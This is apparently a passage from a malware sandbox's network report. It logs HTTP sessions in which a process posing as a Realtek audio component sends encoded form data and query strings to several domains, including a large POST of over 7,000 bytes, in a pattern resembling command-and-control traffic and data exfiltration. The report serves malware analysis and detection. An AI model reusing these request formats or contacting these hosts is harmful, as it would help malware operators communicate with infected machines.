Jan 13, 2025 10:22:51.882846117 CET	1289	IN	HTTP/1.1 404 Not Found Connection: close cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 1251 date: Mon, 13 Jan 2025 09:22:51 GMT server: LiteSpeed Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(25 [TRUNCATED]
Jan 13, 2025 10:22:51.882880926 CET	200	IN	Data Raw: 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e Data Ascii: powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.11.20	49794	160.25.166.123	80	5320	C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 10:22:54.416122913 CET	526	OUT	GET /bwjl/?AuPF3v=DlXUXSIcZnIsgzl0u4NtOaZFY3Bzu0GepY2CMnKH5/Z+wLXeqyLz34dEMj2dm6NLuVk54f0N3OpI5VHZ7BJAsS5zdqtXFQ+nWWO+v3ILJktUUuvXcybstOw=&v1GdZ=vUN3 HTTP/1.1 Host: www.rpa.asia Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en Connection: close User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Jan 13, 2025 10:22:54.775917053 CET	1289	IN	HTTP/1.1 404 Not Found Connection: close cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 1251 date: Mon, 13 Jan 2025 09:22:54 GMT server: LiteSpeed Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(25 [TRUNCATED]
Jan 13, 2025 10:22:54.775971889 CET	200	IN	Data Raw: 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e Data Ascii: powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.11.20	49795	172.67.132.227	80	5320	C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 10:23:00.010214090 CET	799	OUT	POST /kj1o/ HTTP/1.1 Host: www.ogbos88.cyou Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Connection: close Cache-Control: no-cache Content-Length: 203 Content-Type: application/x-www-form-urlencoded Origin: http://www.ogbos88.cyou Referer: http://www.ogbos88.cyou/kj1o/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 41 75 50 46 33 76 3d 58 48 6f 54 6b 49 62 46 31 48 6d 63 52 4e 4d 55 49 62 46 5a 6b 43 7a 6c 55 66 79 74 78 79 67 4e 51 6c 33 48 61 6c 51 57 41 7a 6c 54 61 69 4b 76 72 4f 59 67 6b 44 51 5a 73 46 51 32 41 37 76 4a 42 69 33 58 5a 6f 7a 54 31 63 56 6e 2f 76 66 32 45 32 58 47 51 4d 4e 35 34 37 47 30 79 35 61 58 58 41 36 71 75 32 68 72 46 34 4d 55 5a 63 64 6b 62 46 65 52 4f 61 66 5a 30 6e 5a 45 5a 5a 52 67 4b 74 69 36 30 4f 72 2b 35 44 65 48 76 53 48 34 69 52 50 56 2b 52 37 44 77 35 57 75 52 52 66 58 55 70 34 4d 70 72 36 44 78 77 6a 75 5a 41 73 77 73 49 6d 57 6d 35 43 47 6a 71 51 42 6a 78 4a 4e 76 51 3d 3d Data Ascii: AuPF3v=XHoTkIbF1HmcRNMUIbFZkCzlUfytxygNQl3HalQWAzlTaiKvrOYgkDQZsFQ2A7vJBi3XZozT1cVn/vf2E2XGQMN547G0y5aXXA6qu2hrF4MUZcdkbFeROafZ0nZEZZRgKti60Or+5DeHvSH4iRPV+R7Dw5WuRRfXUp4Mpr6DxwjuZAswsImWm5CGjqQBjxJNvQ==
Jan 13, 2025 10:23:00.123378038 CET	802	IN	HTTP/1.1 301 Moved Permanently Date: Mon, 13 Jan 2025 09:23:00 GMT Content-Type: text/html Content-Length: 167 Connection: close Cache-Control: max-age=3600 Expires: Mon, 13 Jan 2025 10:23:00 GMT Location: https://ogbos88vip.click Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bYCBVEieRp3yLL4rxKO5fjcFf4N8hR5esgWDAbuaswZa4kntrJkKVhtAjRDFHWh1UrYsm1h8G%2BCUa3O%2B9johivk9tyD210pSRH08lYiWbMZu5t4TMZN19TKRcer5EMGbCb82"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Vary: Accept-Encoding Server: cloudflare CF-RAY: 901453355d319c84-IAD Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.11.20	49796	172.67.132.227	80	5320	C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 10:23:02.639539957 CET	819	OUT	POST /kj1o/ HTTP/1.1 Host: www.ogbos88.cyou Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Connection: close Cache-Control: no-cache Content-Length: 223 Content-Type: application/x-www-form-urlencoded Origin: http://www.ogbos88.cyou Referer: http://www.ogbos88.cyou/kj1o/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 41 75 50 46 33 76 3d 58 48 6f 54 6b 49 62 46 31 48 6d 63 65 4d 38 55 62 49 64 5a 74 43 7a 69 62 2f 79 74 2f 69 67 4a 51 6c 4c 48 61 6b 6b 34 44 42 52 54 62 43 36 76 6f 50 59 67 6a 44 51 5a 34 56 51 76 4e 62 76 43 42 69 37 78 5a 74 54 54 31 59 31 6e 2f 75 76 32 45 46 76 46 51 63 4e 73 77 62 47 71 39 5a 61 58 58 41 36 71 75 32 46 53 46 34 55 55 5a 74 74 6b 62 6b 65 65 41 36 66 59 7a 6e 5a 45 50 5a 52 73 4b 74 6a 76 30 4e 75 5a 35 46 53 48 76 58 37 34 6c 45 76 53 30 52 37 46 2b 5a 58 5a 53 55 2f 63 55 49 73 72 75 5a 69 39 78 31 72 77 59 57 68 71 78 36 53 79 6c 71 65 30 6e 61 70 70 68 7a 49 57 79 52 33 47 47 31 7a 6b 62 76 4b 2f 4e 57 78 72 78 4c 64 46 64 37 6b 3d Data Ascii: AuPF3v=XHoTkIbF1HmceM8UbIdZtCzib/yt/igJQlLHakk4DBRTbC6voPYgjDQZ4VQvNbvCBi7xZtTT1Y1n/uv2EFvFQcNswbGq9ZaXXA6qu2FSF4UUZttkbkeeA6fYznZEPZRsKtjv0NuZ5FSHvX74lEvS0R7F+ZXZSU/cUIsruZi9x1rwYWhqx6Sylqe0napphzIWyR3GG1zkbvK/NWxrxLdFd7k=
Jan 13, 2025 10:23:02.753798008 CET	806	IN	HTTP/1.1 301 Moved Permanently Date: Mon, 13 Jan 2025 09:23:02 GMT Content-Type: text/html Content-Length: 167 Connection: close Cache-Control: max-age=3600 Expires: Mon, 13 Jan 2025 10:23:02 GMT Location: https://ogbos88vip.click Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3m0zHkjRpqfnT%2FCkqGZQ6p9UZB7AUf5EMtDsiuaTs5MCPfslgdn58nlwbhqD4hQr64Ur%2BK%2Fw5pAc247SVo88CVsaJ50pOxCl0rhsFOiIiaET%2FrJShonsMGeqJTV1Fe8GPkPF"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Vary: Accept-Encoding Server: cloudflare CF-RAY: 90145345c93f7faa-IAD Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.11.20	49797	172.67.132.227	80	5320	C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 10:23:05.264442921 CET	2578	OUT	POST /kj1o/ HTTP/1.1 Host: www.ogbos88.cyou Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Connection: close Cache-Control: no-cache Content-Length: 7371 Content-Type: application/x-www-form-urlencoded Origin: http://www.ogbos88.cyou Referer: http://www.ogbos88.cyou/kj1o/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 41 75 50 46 33 76 3d 58 48 6f 54 6b 49 62 46 31 48 6d 63 65 4d 38 55 62 49 64 5a 74 43 7a 69 62 2f 79 74 2f 69 67 4a 51 6c 4c 48 61 6b 6b 34 44 42 70 54 62 77 79 76 6f 73 77 67 69 44 51 5a 37 56 51 71 4e 62 76 44 42 69 6a 31 5a 74 58 35 31 61 4e 6e 2b 49 54 32 54 45 76 46 65 63 4e 73 76 4c 47 72 79 35 61 43 58 44 54 68 75 32 56 53 46 34 55 55 5a 75 31 6b 53 56 65 65 43 36 66 5a 30 6e 5a 41 5a 5a 52 41 4b 74 37 2f 30 4d 61 6a 35 31 79 48 73 32 4c 34 6e 33 48 53 38 52 37 48 35 5a 58 42 53 55 36 45 55 4a 41 6e 75 59 57 54 78 79 58 77 63 42 38 72 67 70 75 54 39 49 47 38 71 6f 31 53 6d 6c 59 33 73 51 72 4d 58 54 72 34 45 6f 43 35 4f 6e 6c 62 6b 70 68 53 66 38 33 7a 45 67 51 72 39 41 42 32 73 51 6c 36 79 5a 63 6d 35 35 44 53 68 79 6e 4d 37 32 32 37 79 6d 55 75 74 59 76 61 62 76 74 68 47 36 54 42 59 42 4c 45 31 39 6f 61 44 76 72 58 63 63 44 37 44 32 47 51 4a 50 44 76 36 49 49 35 78 38 64 64 46 6c 39 56 4f 46 41 4e 33 72 64 43 69 4c 56 6e 4e 72 47 68 35 35 73 4c 43 38 75 33 6a 43 68 39 51 4c 67 55 66 4a 65 [TRUNCATED] Data Ascii: AuPF3v=XHoTkIbF1HmceM8UbIdZtCzib/yt/igJQlLHakk4DBpTbwyvoswgiDQZ7VQqNbvDBij1ZtX51aNn+IT2TEvFecNsvLGry5aCXDThu2VSF4UUZu1kSVeeC6fZ0nZAZZRAKt7/0Maj51yHs2L4n3HS8R7H5ZXBSU6EUJAnuYWTxyXwcB8rgpuT9IG8qo1SmlY3sQrMXTr4EoC5OnlbkphSf83zEgQr9AB2sQl6yZcm55DShynM7227ymUutYvabvthG6TBYBLE19oaDvrXccD7D2GQJPDv6II5x8ddFl9VOFAN3rdCiLVnNrGh55sLC8u3jCh9QLgUfJeKx3lAirVxgQND0gbkRaAAniDbLJz2k7dSWE5yFZEUaOADkKuEIjwTQly/qfGuNnBAyxr04WNyp1odqbRNei/IjZA3bIiEiAr/kHcoGoEtJpqcg6UntDbo6jocQX84qspY1ZJ0p8FcIRT1vNJDVE4yIkImROWLh0Ow8jDdLv2C/L4AFTnDMvjuFGjKA2tHWwhU1caOR82yMGGsacYREDshpiXMixHChlwV1bOcao17swzRzb7K2AoMCULnl9MNGICEJje5+RXGg8i6QV110SIWi61SuI8K4BfjCwXJlsUkE3ARHZysswkg3cquqA9PBCyWdUxfhjhykrYqasrWAXAv2pSybc06Z6XLDsTI6ztFY+Mq8Gq/P3zQTBxTjHqLgr+G/tqGjJs2Kc7JrmzC2kKlxONDbzDv0jLGRXzwUGQSU4IAppAhzUrfdkk4P7w+cqPAu9ofscbQAo+YMfJ2UZeTrNMkVfN59CyZ9uKqp+0xMxVTl2wvSY0d3UfpdsCxJZGCijmJ5PNTOUFnSkZGhfXNiijFWGpedP+MCYqykrbTwfmU1p9NEOkfFHLDtt52WWK+eJVGtzuB2gtVX3hYc052dYU/mT21ctshvXmBytH/BN/5axChIYIW/8t1UhymWbJnqh8yTQyzLJtDYraNeNh8aJnWr6Fhq603Z [TRUNCATED]
Jan 13, 2025 10:23:05.264506102 CET	5390	OUT	Data Raw: 4a 34 78 67 34 4d 30 42 7a 4d 6c 4f 71 2b 46 2f 69 75 44 69 49 47 61 50 4a 57 52 46 31 70 64 49 54 58 41 49 7a 64 6e 78 74 2f 72 44 73 6d 51 33 72 66 6b 65 63 41 41 43 35 79 67 59 79 41 31 47 73 46 55 35 6c 63 67 32 38 54 63 41 54 64 4b 6e 71 45 Data Ascii: J4xg4M0BzMlOq+F/iuDiIGaPJWRF1pdITXAIzdnxt/rDsmQ3rfkecAAC5ygYyA1GsFU5lcg28TcATdKnqE1DB8yJKSVpVBLHJ7i9xmFrnlJoGN0tBkMBhetLYM6HwPyXY14vg65Laudks85YxhIu8aVsjdzm1D8a3DRAHCHmP2miBFXgghyV6sNiJFh5hzgChmLiqSEmUxEJrOAfcZvjP3P8XT2DZU9w9R7RQ+KNHnimju9Johy
Jan 13, 2025 10:23:05.372648001 CET	806	IN	HTTP/1.1 301 Moved Permanently Date: Mon, 13 Jan 2025 09:23:05 GMT Content-Type: text/html Content-Length: 167 Connection: close Cache-Control: max-age=3600 Expires: Mon, 13 Jan 2025 10:23:05 GMT Location: https://ogbos88vip.click Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qakTMOitgzKPOiiNk0zTPZ75UldCcO31664jMUb7MIBJyFPhp9M6lSHBYKMzvS%2FzHNOgRdWtc%2F%2FRWzyS8w2SN9fJj3UwvmejalyjnSEVBkwx4h9iVMk6M4QnkqGz%2BranT12q"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Vary: Accept-Encoding Server: cloudflare CF-RAY: 901453563d33d691-IAD Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.11.20	49798	172.67.132.227	80	5320	C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 10:23:07.887639046 CET	530	OUT	GET /kj1o/?v1GdZ=vUN3&AuPF3v=aFAzn/LT2mOAaNQHP98soQbFSeChigB+MmjNXW9rGStYTR2loNwIsxAevG8AaM/8DgC1YrG7rp0i0fn4DlXpdNAv+6uTj4+oUBXQskl/LrNJEccoBVqSJKs= HTTP/1.1 Host: www.ogbos88.cyou Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en Connection: close User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Jan 13, 2025 10:23:08.001671076 CET	777	IN	HTTP/1.1 301 Moved Permanently Date: Mon, 13 Jan 2025 09:23:07 GMT Content-Type: text/html Content-Length: 167 Connection: close Cache-Control: max-age=3600 Expires: Mon, 13 Jan 2025 10:23:07 GMT Location: https://ogbos88vip.click Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oQwOo0SsBhr%2FhTms69mdCxSDkCqgNzNWzlbcLszHgwSdyWJ3DU20ycysP2hEknkDQGtJt1uMl7CzFTfM54PjDbuRZ4BcMgQfODFh3GJH9VmPaYtsarYq2voHXemSmb5l27dZ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 901453669860078c-IAD Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.11.20	49799	136.243.64.147	80	5320	C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 10:23:22.056221008 CET	826	OUT	POST /cxj4/ HTTP/1.1 Host: www.100millionjobs.africa Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Connection: close Cache-Control: no-cache Content-Length: 203 Content-Type: application/x-www-form-urlencoded Origin: http://www.100millionjobs.africa Referer: http://www.100millionjobs.africa/cxj4/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 41 75 50 46 33 76 3d 74 49 46 69 2b 57 4e 73 4a 6a 51 46 6d 48 49 50 47 61 64 4b 6c 5a 43 61 64 66 66 59 33 65 6a 5a 41 2b 67 77 48 76 76 4f 6d 49 45 75 54 35 4e 41 46 59 54 31 66 65 39 32 4c 6f 79 2f 51 58 65 70 6f 7a 51 73 72 4f 33 42 7a 77 70 73 79 62 45 31 7a 76 2f 76 71 67 55 2b 44 7a 56 38 49 37 45 76 35 45 50 4c 4c 4d 76 47 54 51 46 31 6c 61 61 43 34 44 76 50 35 45 62 4d 4c 6b 79 51 6d 43 58 4d 6b 63 52 33 2f 31 38 55 73 2f 2b 48 54 39 64 66 45 55 50 71 43 32 6f 53 72 4a 73 2b 47 31 6c 41 54 6f 51 48 68 49 55 34 59 78 32 38 76 4e 69 4a 75 35 31 78 41 63 70 30 4c 6f 4b 70 67 36 79 6d 6b 41 3d 3d Data Ascii: AuPF3v=tIFi+WNsJjQFmHIPGadKlZCadffY3ejZA+gwHvvOmIEuT5NAFYT1fe92Loy/QXepozQsrO3BzwpsybE1zv/vqgU+DzV8I7Ev5EPLLMvGTQF1laaC4DvP5EbMLkyQmCXMkcR3/18Us/+HT9dfEUPqC2oSrJs+G1lAToQHhIU4Yx28vNiJu51xAcp0LoKpg6ymkA==
Jan 13, 2025 10:23:22.251988888 CET	493	IN	HTTP/1.1 302 Found Date: Mon, 13 Jan 2025 09:23:22 GMT Server: Apache Location: http://maximumgroup.co.za/cxj4/ Content-Length: 290 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 6d 61 78 69 6d 75 6d 67 72 6f 75 70 2e 63 6f 2e 7a 61 2f 63 78 6a 34 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 31 30 30 6d 69 6c 6c 69 6f 6e 6a 6f 62 73 2e 61 66 72 69 63 61 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="http://maximumgroup.co.za/cxj4/">here</a>.</p><hr><address>Apache Server at www.100millionjobs.africa Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
